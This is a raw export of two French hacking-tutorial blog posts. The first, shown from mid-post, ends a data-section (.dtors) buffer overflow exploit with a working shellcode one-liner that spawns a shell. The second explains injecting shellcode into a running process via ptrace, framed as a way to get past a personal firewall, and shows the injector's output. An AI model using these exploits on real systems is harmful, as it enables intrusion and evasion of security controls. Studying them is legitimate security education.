les</span><br /><span style="color: rgb(204, 204, 204);">informations pour exploiter notre programme.</span><br /><br /><span style="color: rgb(204, 204, 204);">On utilisera ici un shellcode de 18 Octets soit le calcul suivant :</span><br /><span style="color: rgb(255, 0, 0);"> 272-18=254</span><br /><br /><span style="color: rgb(204, 204, 204);">B</span><span style="color: rgb(255, 0, 0);"><span style="color: rgb(204, 204, 204);">uffer :</span>0x8049560 </span><span style="color: rgb(255, 0, 0);"></span><br /><span style="color: rgb(255, 0, 0);">donc en little endian :</span><br /><span style="color: rgb(255, 0, 0);">\x60\x95\x04\x08</span><br /><span style="color: rgb(204, 204, 204);">Reste plus qu'a rassembler les infos pour créer notre exploit :</span><br /><br /><span style="color: rgb(255, 0, 0);">[kmkz@localhost </span><span style="color: rgb(255, 0, 0);">Data</span><span style="color: rgb(255, 0, 0);">_overflow]$ ./vuvu `printf "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\x<br />cd\x80"``perl -e 'print "A"x254'``printf "\x60\x95\x04\x08"`</span><br /><span style="color: rgb(255, 0, 0);">sh-3.2$ </span><br />On vois ici l'un des avantages de cette méthode : Nous n'avons eu besoin que de programmes classique (objdump/gdb) pour récupérer ce dont nous avions besoin ; mais il faut pour cela un binaire "readable" (ce qui n'est pas toujour le cas .<br />Parcontre , du coup , pour que Notre shellcode s'exécute il nous faudra attendre la fin du programme (appel a exit() donc au destructeur ) contrairement a une exploitation qui se déroulerait sur la pile .<br />Et , rappellez-vous au sujet des Ctors et Dtors : ce sont deux attributs du<br />compilateurs gcc comme on l'a dit plus haut .<br />En tant que tel il est aussi nécéssaire que le programme vulnérable ait été compilé avec !<br />Voila , reste plus qu'a vous fournir les sources e ta vous souhaiter plein de bonnes choses ;-) .<br />A trés bientot pour de nouvelles aventures :'-) .<br /><span style="color: rgb(255, 0, 0);"><span style="color: rgb(204, 204, 204);"><span style="color: rgb(51, 102, 255);">----------------------------------><br /><a style="color: rgb(51, 51, 255);" href="http://membres.lycos.fr/profil4/kmkz/Data_based_overflow/vuvu.c">Programme vulnérable </a><br /><a href="http://membres.lycos.fr/profil4/kmkz/Data_based_overflow/Data_poc.pl"><br />Proof of concept (pl)</a><br /><br /><span style="color: rgb(204, 204, 204);">Et comme l'été on s'ennui :</span><br /><span style="color: rgb(51, 51, 255);"><br /><a href="http://membres.lycos.fr/profil4/kmkz/Data_based_overflow/data-poc.c">Proof of concept (c)</a><br /><br /></span></span></span></span><span style="color: rgb(255, 0, 0);"><span style="color: rgb(204, 204, 204);"><span style="color: rgb(51, 102, 255);"><---------------------------------- <span style="color: rgb(204, 204, 204);">See you .... o/</span><br /></span></span></span>kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com1tag:blogger.com,1999:blog-4457623080129847893.post-48253220312877972252008-07-20T10:27:00.000+02:002008-07-21T15:42:17.794+02:00Principes et mise en oeuvre d'un injection de code dans un processus en cours via le syscall PTRACE()Yop all o/ !<br />Comme vous l'aurez sans doute compris dans le titre , cet article va traiter (pas trés original comme sujet j'en conviens) des injections de Shellcode dans un processus actif grace au syscall <span style="color: rgb(255, 0, 0);">Ptrace()</span> .<br /><br /><span style="color: rgb(0, 0, 0);">Commençons donc par une petite explication et mise en situation :</span><br /><br /><---------------------------------------------><br /><span style="color: rgb(51, 102, 255);">Avant tout un petit mot sur l'environnement de test utilisé ici :</span><br /><span style="color: rgb(255, 0, 0);"># uname -a</span><br /><span style="color: rgb(255, 0, 0);">Linux localhost 2.6.22.19-desktop-2mdv #1 SMP Mon May 5 20:55:05 EDT 2008 i686 Intel(R) Pentium(R) 4 CPU 2.93GHz GNU/Linux </span><br /><span style="color: rgb(51, 102, 255);">Le tout sans aucune modifications ,attention toutefois car il est ici nécéssaire de posséder une pile exécutable ( on joue encore une fois avec la stack ) bien qu'en y réfléchissant longuement , il peu etre possible de l'adapté sur n'importe quel OS ( d'aprés ce que j'ai pu lire sur phrack ;-) ) .</span><br /><---------------------------------------------><br />-Il faut savoir que ce type d'injection est souvent utilisée par les codes malveillants afin de contourner les sécuritées mise en place sur une machine .<br /><br /><span style="color: rgb(51, 102, 255);">exemple :</span><br />Imaginons un poste de travail "sécurisé " par un firewall personnel ; en général ces programmes ont pour but de filtrer/bloquer l'accés au net pour certaines applications.<br />Cependant , supposons que nous voulions compromettre cette machine et faire en sorte d'obtenir un accés sortant (on peu tout aussi bien vouloir faire autre chose , mais ceci est a titre d'exemple hein ;-) ) , dans ce cas comment vas-t-on s'y prendre ..?<br /><br />Sachant qu'au minimum le navigateur doit posséder un accés sortant , nous allons donc injecter notre shellcode dans la mémoire utilisée par ce processus puis faire en sorte qu'il poursuive son activité , comme si de rien n'était .<br />De cette façon nous pouvons utiliser les droits du navigateur et,donc avoir un accés sortant sans etre inquiété !<br /><br />Pour cela il sera donc nécessaire de ne pas tuer le processus en fesant donc en sorte qu'une fois le pointeur EIP pointe sur le shellcode , l'exécute puis se replace (POP / RET) de façon a reprendre l'exécution du processus cible.<br /><br /><span style="color: rgb(51, 102, 255);">Etapes a suivre :<br /><span style="color: rgb(0, 0, 0);"><span style="color: rgb(204, 204, 204);">1- S'attacher au processus ciblé (</span><span style="color: rgb(255, 0, 0);">PTRACE_ATTACH</span><span style="color: rgb(204, 204, 204);">)</span><br /><br /><span style="color: rgb(204, 204, 204);">2-Attendre qu'il stoppe (</span><span style="color: rgb(255, 0, 0);">WAITPID</span><span style="color: rgb(204, 204, 204);">)</span><br /><br /><span style="color: rgb(204, 204, 204);">3-Récupération des registres utilisés par ce process(</span><span style="color: rgb(255, 0, 0);">PTRACE_GETREGS</span><span style="color: rgb(204, 204, 204);">)</span><br /><br /><span style="color: rgb(204, 204, 204);">4-Copie du Shellcode dans la stack (</span><span style="color: rgb(255, 0, 0);">PTRACE_POKEDATA</span><span style="color: rgb(204, 204, 204);">)</span><br /><br /><span style="color: rgb(204, 204, 204);">5-Redirection du pointeur vers le début de nore Shellcode (</span><span style="color: rgb(255, 0, 0);">PTRACE_SETREGS</span><span style="color: rgb(204, 204, 204);">)</span><br /><br /><span style="color: rgb(204, 204, 204);">6-Se détacher (</span><span style="color: rgb(255, 0, 0);">PTRACE_DETACH</span><span style="color: rgb(204, 204, 204);">)</span><br /><br /><span style="color: rgb(204, 204, 204);"> Néanmoins,, il se peut que le processus ait été interrompu par le ptrace (</span><span style="color: rgb(255, 0, 0);">PTRACE_ATTACH</span><span style="color: rgb(204, 204, 204);">) alors qu’il exécuté un appel système.</span><br /><span style="color: rgb(204, 204, 204);">Dans ce cas, le noyau décide de remettre l’ex écution a l’endroit ou elle a été interrompue, c’est-a-dire l’appel système. Sous Linux pour x86, un appel système est déclenché́ par l’instruction</span> <span style="color: rgb(255, 0, 0);">int</span> <span style="color: rgb(255, 0, 0);">0x80</span><span style="color: rgb(204, 204, 204);">, codée sur 2 octets.</span><br /><span style="color: rgb(204, 204, 204);">Avant de rendre la main au processus, le noyau modifie donc le registre eip, en lui enlevant 2 octets. Or, nous ne souhaitons pas que l’exé́cution reprenne la ou ne se trouve pas notre shellcode!</span><br /><span style="color: rgb(204, 204, 204);">Pour compenser cela, on ajoutera</span><span style="color: rgb(255, 0, 0);"> 2 Nops (\x90)</span> <span style="color: rgb(204, 204, 204);">au début du shellcode (et on oublira pas de modifier la valeur dans la boucle au passage sinon elle n'enverra pas tout le shellcode ). </span><br /><br /><span style="color: rgb(204, 204, 204);">Voila, on peu désormais passer a la pratique .Dans un premier temps je détaillerais donc les différentes étapes , puis je vous donnerais le code "<span style="color: rgb(255, 0, 0);">Shell_inj</span>" (Shellcode injector quoi -_- ) .</span><br /><span style="color: rgb(51, 102, 255);">(Ce code est déja suffisemment commenté pour vous permettre de le comprendre facilement)</span><br /> <br /><span style="color: rgb(204, 204, 204);"> -- Nous allons , dans l'exemple suivant , injecter un dangereux shellcode (Hello , world! :-) ) dans un processus cible (ici bash sera la cible) -</span><br /><br /><span style="color: rgb(204, 204, 204);">On commence par récupérer son PID:</span><br /><span style="color: rgb(255, 0, 0);">[kmkz@localhost Bureau]$ ps aux</span><br /><span style="color: rgb(204, 204, 204);">Ce qui donnera un listing assez long (top pour etre mis ici en entier en tout cas ) .</span><br /><span style="color: rgb(204, 204, 204);">Nous , on s'intéressera donc a ça :</span><br /><span style="color: rgb(255, 0, 0);">kmkz 7178 0.3 0.1 4324 1920 pts/0 Ss+ 10:58 0:00 bash<br /><span style="color: rgb(0, 0, 0);"><span style="color: rgb(204, 204, 204);">Bon , on a le PID reste plus qu'a s'amuser now ! \o/</span><br /><span style="color: rgb(204, 204, 204);">Je suppose que vous savez déja utiliser Gcc et donc ne reviendrais pas la dessus ..</span><br /><span style="color: rgb(204, 204, 204);">Lançons le programme Shell_inj en lui passant en argument notre PID et voyons ce qui se passe :</span><br /><br /><span style="color: rgb(255, 0, 0);">[kmkz@localhost Bureau]$ ./inj 7178</span><br /><span style="color: rgb(255, 0, 0);">[+] Attente d'attachement au processus 7178 ...</span><br /><span style="color: rgb(255, 0, 0);">[+] Attachement au processus : réussi</span><br /><span style="color: rgb(255, 0, 0);">[+] Lecture des registres:</span><br /><span style="color: rgb(255, 0, 0);"> -eip: 0xffffe410</span><br /><span style="color: rgb(255, 0, 0);"> -esp: 0xbfe478d8</span><br /><span style="color: rgb(255, 0, 0);">[+] Shellcode copié en esp:0xbfe468d8</span><br /><span style="color: rgb(255, 0, 0);">[+] Redirection d'eip vers le shellcode :0xbfe468da</span><br /><span style="color: rgb(255, 0, 0);">[+] Détachement du processus 7178</span><br /><br /><span style="color: rgb(255, 0, 0);">[+] Injection Terminée ! </span><br /><span style="color: rgb(255, 0, 0);">Hello,World !<br /><br /><span style="color: rgb(204, 204, 204);">Bingo, notre "hello world" est bien la , en chair et en os (enfin si on veux quoi ^_^).<br />C'est a vous de jouer maintenant : vous savez détourner un processus en y injectant un shellcode pour en faire ce que vous voulez alors ....<br />___<br />*Here's the Shell_inj source code:<br /></span></span></span></span><span style="color: rgb(51, 102, 255);"><a href="http://membres.lycos.fr/profil4/kmkz/ptrace/inj.txt">Shell_inj.c</a><span style="color: rgb(204, 204, 204);"><br /></span><br /></span></span></span><span style="color: rgb(51, 102, 255);"><span style="color: rgb(0, 0, 0);"><span style="color: rgb(255, 0, 0);"><span style="color: rgb(0, 0, 0);"><span style="color: rgb(255, 0, 0);"><span style="color: rgb(204, 204, 204);">Have Fun !</span></span></span></span></span></span><br /><span style="color: rgb(51, 102, 255);"><span style="color: rgb(0, 0, 0);"><br /><span style="color: rgb(204, 204, 204);">Remerciements a l'équipe de "blacks clowns" pour son article sans lequel j'aurai mis des mois avant de percuter comment m'y prendre ^^ ainsi qu'a l'équipe de dg-sc pour phrack et ses tutos de 1er choix !</span><br /></span></span>kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com3